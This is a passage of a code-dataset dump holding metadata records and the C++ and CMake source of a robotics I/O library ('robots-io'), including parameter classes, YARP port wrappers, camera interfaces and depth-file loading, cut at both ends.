\" << mutual_mean_difference * 1000.0 << std::endl;\n\n\n return EXIT_SUCCESS;\n}\n\n\nbool parse_size_t (char** argv, const std::size_t& index, const std::string& name, std::size_t& retrieved)\n{\n try\n {\n if (std::stoi(argv[index]) < 0)\n throw(std::invalid_argument(\"\"));\n retrieved = std::stoul(argv[index]);\n }\n catch (std::invalid_argument)\n {\n std::cerr << \"Invalid value \" << argv[index] << \" for parameter <\" << name << \">.\" << std::endl;\n return false;\n }\n\n return true;\n}\n"
},
{
"alpha_fraction": 0.6487354636192322,
"alphanum_fraction": 0.6531513333320618,
"avg_line_length": 22.951923370361328,
"blob_id": "feb14d64a8577d4ac3259ef7aed45447547aaae8",
"content_id": "9cd8faa5bceb3d71b182428e88a2e21b7b64a2d1",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2491,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 104,
"path": "/src/RobotsIO/src/Utils/ParametersYarpPort.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/ParametersYarpPort.h>\n\n#include <yarp/os/Value.h>\n\nusing namespace RobotsIO::Utils;\nusing namespace yarp::os;\n\n\nParametersYarpPort::ParametersYarpPort(const std::string& port_name) :\n YarpBufferedPort<Bottle>(port_name)\n{}\n\n\nParametersYarpPort::~ParametersYarpPort()\n{}\n\n\nbool ParametersYarpPort::receive_parameters()\n{\n Bottle* bottle = receive_data(false);\n\n if (bottle == nullptr)\n return false;\n else\n {\n last_parameters_ = *bottle;\n\n data_available_ = true;\n\n return true;\n }\n}\n\n\nconst std::pair<bool, std::string> ParametersYarpPort::fill_string(const std::string& key) const\n{\n if (!data_available_)\n return std::make_pair(false, std::string());\n\n Value value = last_parameters_.find(key);\n if (value.isNull())\n return std::make_pair(false, std::string());\n\n return std::make_pair(true, value.asString());\n}\n\n\nconst std::pair<bool, std::size_t> ParametersYarpPort::fill_size_t(const std::string& key) const\n{\n if (!data_available_)\n return std::make_pair(false, std::size_t());\n\n Value value = last_parameters_.find(key);\n if (value.isNull())\n return std::make_pair(false, std::size_t());\n\n return std::make_pair(true, value.asInt32());\n}\n\n\nconst std::pair<bool, int> ParametersYarpPort::fill_int(const std::string& key) const\n{\n if (!data_available_)\n return std::make_pair(false, int());\n\n Value value = last_parameters_.find(key);\n if (value.isNull())\n return std::make_pair(false, int());\n\n return std::make_pair(true, value.asInt32());\n}\n\n\nconst std::pair<bool, double> ParametersYarpPort::fill_double(const std::string& key) const\n{\n if (!data_available_)\n return std::make_pair(false, double());\n\n Value value = last_parameters_.find(key);\n if (value.isNull())\n return std::make_pair(false, double());\n\n return std::make_pair(true, value.asFloat64());\n}\n\n\nconst std::pair<bool, bool> ParametersYarpPort::fill_bool(const std::string& key) const\n{\n if (!data_available_)\n return std::make_pair(false, bool());\n\n Value value = last_parameters_.find(key);\n if (value.isNull())\n return std::make_pair(false, bool());\n\n return std::make_pair(true, value.asBool());\n}\n"
},
{
"alpha_fraction": 0.7023295760154724,
"alphanum_fraction": 0.7109577059745789,
"avg_line_length": 25.340909957885742,
"blob_id": "bc0fa9e58b9e9db95f321c30cc7880e72f5ac54e",
"content_id": "4f0ee048a18ae7813e03c0c61ebb6655157a49f9",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1159,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 44,
"path": "/src/RobotsIO/include/RobotsIO/Utils/ParametersExtractor.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_PARAMETERS_EXTRACTOR_H\n#define ROBOTSIO_PARAMETERS_EXTRACTOR_H\n\n#include <string>\n\nnamespace RobotsIO {\n namespace Utils {\n class ParametersExtractor;\n class Parameters;\n }\n}\n\n\nclass RobotsIO::Utils::ParametersExtractor\n{\npublic:\n ParametersExtractor(const RobotsIO::Utils::Parameters& parameters);\n\n void extract_fields();\n\n void extract_field(const std::string& key);\n\n virtual void extract_field(const std::string& key, const std::string& value) = 0;\n\n virtual void extract_field(const std::string& key, const std::size_t& value) = 0;\n\n virtual void extract_field(const std::string& key, const int& value) = 0;\n\n virtual void extract_field(const std::string& key, const double& value) = 0;\n\n virtual void extract_field(const std::string& key, const bool& value) = 0;\n\nprotected:\n const RobotsIO::Utils::Parameters& parameters_;\n};\n\n#endif /* ROBOTSIO_PARAMETERS_EXTRACTOR_H */\n"
},
{
"alpha_fraction": 0.7049999833106995,
"alphanum_fraction": 0.7275000214576721,
"avg_line_length": 18.047618865966797,
"blob_id": "a89e4b63a9b059ac435d3cb9651da008708ed95a",
"content_id": "5ea5681a7f7c6a34496dda5f316fd237e71b2759",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 400,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 21,
"path": "/src/RobotsIO/include/RobotsIO/Utils/Data.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2016-2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_DATA_H\n#define ROBOTSIO_DATA_H\n\n#include <RobotsIO/Utils/any.h>\n\n\nnamespace RobotsIO::Utils\n{\n\ntypedef RobotsIO::Utils::any Data;\n\n}\n\n#endif /* ROBOTSIO_DATA_H */\n"
},
{
"alpha_fraction": 0.6911607980728149,
"alphanum_fraction": 0.7018104195594788,
"avg_line_length": 26.617647171020508,
"blob_id": "2aee25f59e38bd383328c51f3a8bcc9f9596bd6b",
"content_id": "824567c1536871bfd3cb0af268641de346e659f7",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 939,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 34,
"path": "/src/RobotsIO/include/RobotsIO/Utils/ParametersFiller.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_PARAMETERS_FILLER_H\n#define ROBOTSIO_PARAMETERS_FILLER_H\n\n#include <string>\n\nnamespace RobotsIO {\n namespace Utils {\n class ParametersFiller;\n }\n}\n\n\nclass RobotsIO::Utils::ParametersFiller\n{\npublic:\n virtual const std::pair<bool, std::string> fill_string(const std::string& key) const = 0;\n\n virtual const std::pair<bool, std::size_t> fill_size_t(const std::string& key) const = 0;\n\n virtual const std::pair<bool, int> fill_int(const std::string& key) const = 0;\n\n virtual const std::pair<bool, double> fill_double(const std::string& key) const = 0;\n\n virtual const std::pair<bool, bool> fill_bool(const std::string& key) const = 0;\n};\n\n#endif /* ROBOTSIO_PARAMETERS_FILLER_H */\n"
},
{
"alpha_fraction": 0.6356208920478821,
"alphanum_fraction": 0.6658496856689453,
"avg_line_length": 21.254545211791992,
"blob_id": "0feabd2b9f9d47fc07c2e065d0aa7228c7e8807d",
"content_id": "7b17a63909498bf368454d6d56ebf39f9fafae8c",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1224,
"license_type": "permissive",
"max_line_length": 139,
"num_lines": 55,
"path": "/src/RobotsIO/src/Utils/SpatialVelocity.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/SpatialVelocity.h>\n\nusing namespace Eigen;\nusing namespace RobotsIO::Utils;\n\n\nSpatialVelocity::~SpatialVelocity()\n{}\n\n\nEigen::Vector3d SpatialVelocity::angular_velocity()\n{\n return twist().segment<3>(3);\n}\n\n\nEigen::Vector3d SpatialVelocity::linear_velocity_origin()\n{\n return twist().head<3>();\n}\n\n\nEigen::Vector3d SpatialVelocity::linear_velocity_screw()\n{\n double angular_norm = twist().segment<3>(3).norm();\n\n if (angular_norm > 1e-4)\n return twist().head<3>() + twist().segment<3>(3).cross(twist().segment<3>(3).cross(twist().head<3>())) / std::pow(angular_norm, 2);\n\n return twist().head<3>();\n}\n\n\nEigen::Vector3d SpatialVelocity::screw_position()\n{\n double angular_norm = twist().segment<3>(3).norm();\n\n if (angular_norm > 1e-4)\n return twist().segment<3>(3).cross(twist().head<3>()) / std::pow(angular_norm, 2);\n\n return Vector3d::Zero();\n}\n\n\nbool SpatialVelocity::is_screw_degenerate()\n{\n return (twist().segment<3>(3).norm() <= 1e-4);\n}\n"
},
{
"alpha_fraction": 0.6531531810760498,
"alphanum_fraction": 0.6563706398010254,
"avg_line_length": 24.899999618530273,
"blob_id": "76f38017fd41536dc520a8b8fc4fce728821f053",
"content_id": "02772d308fd4fe1d1549cd00378a66d5a7a9be86",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1554,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 60,
"path": "/src/RobotsIO/test/Utils/YarpImageOfMonoFloat/main.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "#include <RobotsIO/Utils/FileToDepth.h>\n#include <RobotsIO/Utils/YarpImageOfMonoFloat.h>\n#include <RobotsIO/Utils/YarpBufferedPort.hpp>\n\n#include <Eigen/Dense>\n\n#include <opencv2/opencv.hpp>\n#include <opencv2/core/eigen.hpp>\n\n#include <yarp/cv/Cv.h>\n#include <yarp/os/Network.h>\n#include <yarp/sig/Image.h>\n\n#include <chrono>\n#include <thread>\n#include <iostream>\n\nusing namespace Eigen;\nusing namespace RobotsIO::Utils;\nusing namespace yarp::sig;\nusing namespace yarp::os;\nusing namespace std::chrono_literals;\n\n\nint main(int argc, char** argv)\n{\n Network yarp;\n if (!yarp.checkNetwork())\n {\n std::cout << \"::main. Unable to find YARP.\" << std::endl;\n\n return EXIT_FAILURE;\n }\n YarpBufferedPort<YarpImageOfMonoFloat> port_out(\"/test/image:o\");\n\n bool valid_depth;\n Eigen::MatrixXf depth_eigen;\n std::tie(valid_depth, depth_eigen) = file_to_depth(\"./depth.float\");\n if (valid_depth)\n std::cout << \"depth image in\" << std::endl;\n\n cv::Mat depth_image;\n cv::eigen2cv(depth_eigen, depth_image);\n\n cv::Mat mask_image = cv::imread(\"./mask.png\", cv::IMREAD_COLOR);\n if (!mask_image.empty())\n std::cout << \"mask image in \" << std::endl;\n cv::cvtColor(mask_image, mask_image, cv::COLOR_BGR2GRAY);\n\n while (true)\n {\n YarpImageOfMonoFloat images;\n images.image_mono = yarp::cv::fromCvMat<PixelMono>(mask_image);\n images.image_float = yarp::cv::fromCvMat<PixelFloat>(depth_image);\n\n port_out.send_data(images);\n\n std::this_thread::sleep_for(1s);\n }\n}\n"
},
{
"alpha_fraction": 0.7263427376747131,
"alphanum_fraction": 0.739130437374115,
"avg_line_length": 25.965517044067383,
"blob_id": "625411eee6e1b9339e91002856626e7c49223566",
"content_id": "6d25345137d07d947bcf874a5ea7575c0a62ed86",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 782,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 29,
"path": "/src/RobotsIO/test/Utils/Parameters/TestParameters.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/Parameters.h>\n#include <RobotsIO/Utils/ParametersExtractor.h>\n\nclass TestParameters : public RobotsIO::Utils::Parameters\n{\npublic:\n TestParameters();\n\n virtual ~TestParameters();\n\n robots_io_accessor(TestParameters);\n\n robots_io_declare_field(TestParameters, int, field0);\n\n robots_io_declare_field(TestParameters, double, field1);\n\n robots_io_declare_field(TestParameters, bool, field2);\n\n robots_io_declare_std_field(TestParameters, string, field3);\n\n robots_io_declare_std_field(TestParameters, size_t, field4);\n};\n"
},
{
"alpha_fraction": 0.7294007539749146,
"alphanum_fraction": 0.7387640476226807,
"avg_line_length": 26.384614944458008,
"blob_id": "8038bf4db8afd509590f9c5d50d92c81011c1d5f",
"content_id": "df36443e6e895676f05b0d3d8e9b483f54bc255c",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1068,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 39,
"path": "/src/RobotsIO/include/RobotsIO/Utils/Parameters2YarpBottle.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_PARAMETERS2YARPBOTTLE_H\n#define ROBOTSIO_PARAMETERS2YARPBOTTLE_H\n\n#include <RobotsIO/Utils/ParametersExtractor.h>\n\n#include <yarp/os/Bottle.h>\n\n\nclass Parameters2YarpBottle : public RobotsIO::Utils::ParametersExtractor\n{\npublic:\n Parameters2YarpBottle(const RobotsIO::Utils::Parameters& parameters);\n\n virtual ~Parameters2YarpBottle();\n\n yarp::os::Bottle extract_to_bottle();\n\n void extract_field(const std::string& key, const std::string& value) override;\n\n void extract_field(const std::string& key, const std::size_t& value) override;\n\n void extract_field(const std::string& key, const int& value) override;\n\n void extract_field(const std::string& key, const double& value) override;\n\n void extract_field(const std::string& key, const bool& value) override;\n\nprivate:\n yarp::os::Bottle bottle_;\n};\n\n#endif\n"
},
{
"alpha_fraction": 0.7049505114555359,
"alphanum_fraction": 0.7089108824729919,
"avg_line_length": 31.23404312133789,
"blob_id": "860ca036823bdef9657b7c5ebac903426fe1cad5",
"content_id": "84ff7896b6917a76ee5e8758fd335f87031208f7",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1515,
"license_type": "permissive",
"max_line_length": 427,
"num_lines": 47,
"path": "/src/RobotsIO/include/RobotsIO/Camera/DatasetCamera.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_DATASETCAMERA_H\n#define ROBOTSIO_DATASETCAMERA_H\n\n#include <RobotsIO/Camera/Camera.h>\n\n#include <string>\n\nnamespace RobotsIO {\n namespace Camera {\n class DatasetCamera;\n }\n}\n\n\nclass RobotsIO::Camera::DatasetCamera : public RobotsIO::Camera::Camera\n{\npublic:\n DatasetCamera(const std::string& data_path, const std::string& data_prefix, const std::string& rgb_prefix, const std::string& depth_prefix, const std::string& data_format, const std::string& rgb_format, const std::string& depth_format, const std::size_t& heading_zeros, const std::size_t& index_offset, const std::size_t& width, const double& height, const double& fx, const double& cx, const double& fy, const double& cy);\n\n virtual ~DatasetCamera();\n\n /**\n * RGB-D and pose.\n */\n\n virtual std::pair<bool, Eigen::MatrixXf> depth(const bool& blocking) override;\n\n virtual std::pair<bool, Eigen::Transform<double, 3, Eigen::Affine>> pose(const bool& blocking) override;\n\n virtual std::pair<bool, cv::Mat> rgb(const bool& blocking) override;\n\n virtual std::pair<bool, double> time_stamp_rgb() const override;\n\n virtual std::pair<bool, double> time_stamp_depth() const override;\n\nprivate:\n const std::string log_name_ = \"DatasetCamera\";\n};\n\n#endif /* ROBOTSIO_DATASETCAMERA_H */\n"
},
{
"alpha_fraction": 0.6463687419891357,
"alphanum_fraction": 0.6505586504936218,
"avg_line_length": 29.86206817626953,
"blob_id": "4c73d99dd94815aa84879bcd52768c7fd1b65fa0",
"content_id": "2312d8d887e03b6bc3a58b2a3dd71e82133e275c",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 3580,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 116,
"path": "/CMakeLists.txt",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "#===============================================================================\n#\n# Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n#\n# This software may be modified and distributed under the terms of the\n# BSD 3-Clause license. See the accompanying LICENSE file for details.\n#\n#===============================================================================\n\ncmake_minimum_required(VERSION 3.5)\n\nproject(RobotsIO\n LANGUAGES CXX\n VERSION 0.0.1)\n\nset(CMAKE_CXX_STANDARD 11)\n\ninclude(GNUInstallDirs)\n\nset(CMAKE_RUNTIME_OUTPUT_DIRECTORY \"${CMAKE_BINARY_DIR}/${CMAKE_INSTALL_BINDIR}\")\nset(CMAKE_LIBRARY_OUTPUT_DIRECTORY \"${CMAKE_BINARY_DIR}/${CMAKE_INSTALL_LIBDIR}\")\nset(CMAKE_ARCHIVE_OUTPUT_DIRECTORY \"${CMAKE_BINARY_DIR}/${CMAKE_INSTALL_LIBDIR}\")\n\nset(CMAKE_WINDOWS_EXPORT_ALL_SYMBOLS ON)\n\nset(CMAKE_POSITION_INDEPENDENT_CODE ON)\n\nset(CMAKE_C_EXTENSIONS OFF)\nset(CMAKE_CXX_EXTENSIONS OFF)\n\nlist(APPEND CMAKE_MODULE_PATH ${CMAKE_CURRENT_SOURCE_DIR}/cmake)\n\nif(WIN32)\n add_definitions(-D_USE_MATH_DEFINES)\n if(MSVC)\n # Since MSVC produces both release and debug\n set(CMAKE_DEBUG_POSTFIX \"d\")\n # Enable parallel compile and optimized handling of exception filters\n set(CMAKE_CXX_FLAGS \"/MP /EHsc\")\n set(CMAKE_C_FLAGS \"/MP /EHsc\")\n endif()\nendif()\n\noption(BUILD_SHARED_LIBS \"Build libraries as shared as opposed to static\" ON)\n\n# Option for tests\n# option(BUILD_TESTING \"Create tests using CMake\" OFF)\n# if(BUILD_TESTING)\n# message(STATUS \"Test enabled\")\n# enable_testing()\n# endif()\n\n# Enable RPATH\ninclude(AddInstallRPATHSupport)\nadd_install_rpath_support(BIN_DIRS \"${CMAKE_INSTALL_FULL_BINDIR}\"\n LIB_DIRS \"${CMAKE_INSTALL_FULL_LIBDIR}\"\n INSTALL_NAME_DIR \"${CMAKE_INSTALL_FULL_LIBDIR}\"\n USE_LINK_PATH)\n\n# Default build type to Release\nif(NOT CMAKE_CONFIGURATION_TYPES)\n if(NOT CMAKE_BUILD_TYPE)\n message(STATUS \"Setting build type to 'Release' as none was specified.\")\n set_property(CACHE CMAKE_BUILD_TYPE PROPERTY VALUE \"Release\")\n endif()\n endif()\n\n# options\noption(USE_YARP \"Use YARP\" OFF)\noption(USE_ICUB \"Use ICUB\" OFF)\noption(USE_SUPERIMPOSE \"Use SuperimposeMesh\" OFF)\n\n# if ICUB is available use ICUBcontrib helpers for installation\nif (USE_ICUB)\n # iCub contrib\n find_package(ICUBcontrib REQUIRED)\n\n list(APPEND CMAKE_MODULE_PATH ${ICUBCONTRIB_MODULE_PATH})\n include(ICUBcontribHelpers)\n include(ICUBcontribOptions)\n\n icubcontrib_set_default_prefix()\n icubcontrib_add_uninstall_target()\nendif()\n\n# Library sources\nadd_subdirectory(src)\n\n# Install the files necessary to call find_package(RobotsIO) in CMake projects\n\n# Dependencies\nset(DEPENDENCIES \"Eigen3\" \"OpenCV\")\n# if (USE_ICUB)\n# set(DEPENDENCIES ${DEPENDENCIES} \"ICUB COMPONENTS iKin\")\n# endif()\nif (USE_YARP)\n set(DEPENDENCIES ${DEPENDENCIES} \"YARP COMPONENTS cv dev eigen os sig\")\nendif()\nif (USE_SUPERIMPOSE)\n set(DEPENDENCIES ${DEPENDENCIES} \"SuperimposeMesh\")\nendif()\n\ninclude(InstallBasicPackageFiles)\ninstall_basic_package_files(${PROJECT_NAME}\n VERSION ${${PROJECT_NAME}_VERSION}\n COMPATIBILITY ExactVersion\n EXPORT ${PROJECT_NAME}\n NO_SET_AND_CHECK_MACRO\n VARS_PREFIX ${PROJECT_NAME}\n NO_CHECK_REQUIRED_COMPONENTS_MACRO\n DEPENDENCIES ${DEPENDENCIES})\n\nif (NOT USE_ICUB)\n # Add standard uninstall target\n include(AddUninstallTarget)\nendif()\n"
},
{
"alpha_fraction": 0.6802139282226562,
"alphanum_fraction": 0.6898396015167236,
"avg_line_length": 14.327868461608887,
"blob_id": "82a6a70d947aca0d3163a6c0098e4568e4d767c7",
"content_id": "053637db2b509c40b3d788f114dd75b2ee3c5afc",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 935,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 61,
"path": "/src/RobotsIO/src/Utils/Segmentation.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2021 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/Segmentation.h>\n\nusing namespace RobotsIO::Utils;\n\n\nSegmentation::~Segmentation()\n{}\n\n\nbool Segmentation::reset()\n{\n return true;\n}\n\n\nbool Segmentation::step_frame()\n{\n return true;\n}\n\n\nvoid Segmentation::reset_data_loading_time()\n{\n}\n\n\ndouble Segmentation::get_data_loading_time() const\n{\n return 0.0;\n}\n\n\nint Segmentation::get_frames_between_iterations() const\n{\n return 1;\n}\n\n\nstd::pair<bool, cv::Mat> Segmentation::latest_segmentation()\n{\n return std::make_pair(false, cv::Mat());\n}\n\n\ndouble Segmentation::get_time_stamp()\n{\n return -1;\n}\n\n\nvoid Segmentation::set_rgb_image(const cv::Mat& image, const double& timestamp)\n{\n /* By default, the input image is not used. */\n}\n"
},
{
"alpha_fraction": 0.6629213690757751,
"alphanum_fraction": 0.6713483333587646,
"avg_line_length": 17.256410598754883,
"blob_id": "a7e9de132d6f13d92bb1ec1f3e17abda608b2109",
"content_id": "db49fb74e08460e19f905e0ada649120b89e26eb",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 712,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 39,
"path": "/src/RobotsIO/include/RobotsIO/Utils/Probe.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_PROBE_H\n#define ROBOTSIO_PROBE_H\n\n#include <RobotsIO/Utils/Data.h>\n\n#include <string>\n\nnamespace RobotsIO {\n namespace Utils {\n class Probe;\n }\n}\n\nclass RobotsIO::Utils::Probe\n{\npublic:\n virtual ~Probe();\n\n void set_data(const RobotsIO::Utils::Data&);\n\n RobotsIO::Utils::Data& get_data();\n\nprotected:\n virtual void on_new_data() = 0;\n\nprivate:\n RobotsIO::Utils::Data data_;\n\n const std::string log_name_ = \"Probe\";\n};\n\n#endif /* ROBOTSIO_PROBE_H */\n"
},
{
"alpha_fraction": 0.6946983337402344,
"alphanum_fraction": 0.70566725730896,
"avg_line_length": 19.259260177612305,
"blob_id": "4fcc5aa5cbb1ae53a15148f9951cbe975f70d3d8",
"content_id": "64cfd33cf7d74d92657b684138357d33719bf174",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 547,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 27,
"path": "/src/RobotsIO/include/RobotsIO/Utils/DataStream.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_DATASTREAM_H\n#define ROBOTSIO_DATASTREAM_H\n\n#include <Eigen/Dense>\n\nnamespace RobotsIO {\n namespace Utils {\n class DataStream;\n }\n}\n\nclass RobotsIO::Utils::DataStream\n{\npublic:\n virtual ~DataStream();\n\n virtual bool freeze(const bool blocking = false) = 0;\n};\n\n#endif /* ROBOTSIO_DATASTREAM_H */\n"
},
{
"alpha_fraction": 0.7003366947174072,
"alphanum_fraction": 0.7104377150535583,
"avg_line_length": 24.826086044311523,
"blob_id": "50d036295fdd91d795c2c883984a823862ec3f2e",
"content_id": "c94326f9655de3ce89051a7904207e4ec2ced4c6",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 594,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 23,
"path": "/src/RobotsIO/include/RobotsIO/Utils/DepthToFile.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_DEPTHTOFILE_H\n#define ROBOTSIO_DEPTHTOFILE_H\n\n#include <Eigen/Dense>\n\n#include <opencv2/opencv.hpp>\n\nnamespace RobotsIO {\n namespace Utils {\n bool depth_to_file(const std::string& output_path, const cv::Mat& depth);\n\n bool depth_to_file(const std::string& output_path, const Eigen::MatrixXf& depth);\n }\n}\n\n#endif /* ROBOTSIO_DEPTHTOFILE_H */\n"
},
{
"alpha_fraction": 0.5589144825935364,
"alphanum_fraction": 0.5692201852798462,
"avg_line_length": 29.96808433532715,
"blob_id": "5626e550e25b82be7e5fd3a76775469ffe9a92c1",
"content_id": "70248d30632b206183b482185b5c675ccb4a20bc",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2911,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 94,
"path": "/src/RobotsIO/src/Utils/FileToDepth.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/FileToDepth.h>\n\n#include <Eigen/Dense>\n\n#include <opencv2/opencv.hpp>\n#include <opencv2/core/eigen.hpp>\n\nusing namespace Eigen;\n\n\nstd::pair<bool, Eigen::MatrixXf> RobotsIO::Utils::file_to_depth(const std::string& file_name)\n{\n const std::string log_name = \"RobotsIO::Utils::file_to_depth\";\n\n /* Identify format */\n auto dot_position = file_name.find_last_of('.');\n if (dot_position == std::string::npos)\n {\n std::cout << log_name << \"Error: invalid file extension in provided file name \" + file_name << std::endl;\n return std::make_pair(false, MatrixXf());\n }\n std::string format = file_name.substr(dot_position);\n\n if (format == \".float\")\n {\n std::FILE* in;\n\n if ((in = std::fopen(file_name.c_str(), \"rb\")) == nullptr)\n {\n std::cout << log_name << \"Error: cannot open file \" + file_name << std::endl;\n return std::make_pair(false, MatrixXf());\n }\n\n /* Load image size .*/\n std::size_t dims[2];\n if (std::fread(dims, sizeof(dims), 1, in) != 1)\n {\n std::cout << log_name << \"Error: cannot load depth size for frame \" + file_name << std::endl;\n\n fclose(in);\n\n return std::make_pair(false, MatrixXf());\n }\n\n /* Load image. */\n float float_image_raw[dims[0] * dims[1]];\n if (std::fread(float_image_raw, sizeof(float), dims[0] * dims[1], in) != dims[0] * dims[1])\n {\n std::cout << log_name << \"Error: cannot load depth data for frame \" + file_name << std::endl;\n\n fclose(in);\n\n return std::make_pair(false, MatrixXf());\n }\n\n /* Store image. */\n MatrixXf float_image(dims[1], dims[0]);\n float_image = Map<Matrix<float, -1, -1, RowMajor>>(float_image_raw, dims[1], dims[0]);\n\n fclose(in);\n\n return std::make_pair(true, float_image);\n }\n else if (format == \".png\")\n {\n cv::Mat image = cv::imread(file_name, cv::IMREAD_UNCHANGED);\n\n if (image.empty())\n {\n std::cout << log_name << \"Error: cannot load depth data for frame \" + file_name << std::endl;\n\n return std::make_pair(false, MatrixXf());\n }\n\n MatrixXf float_image(image.rows, image.cols);\n cv::cv2eigen(image, float_image);\n\n /* FIXME: the depth_scale should be an input parameter. */\n float depth_scale = 0.1 / 1000.0;\n float_image *= depth_scale;\n\n return std::make_pair(true, float_image);\n }\n\n std::cout << log_name << \"Error: not supported file extension in provided file name \" + file_name << std::endl;\n return std::make_pair(false, MatrixXf());\n}\n"
},
{
"alpha_fraction": 0.6733524203300476,
"alphanum_fraction": 0.6790831089019775,
"avg_line_length": 21.88524627685547,
"blob_id": "b9fad20b522d68dbadffe0ff693883abdaa31e52",
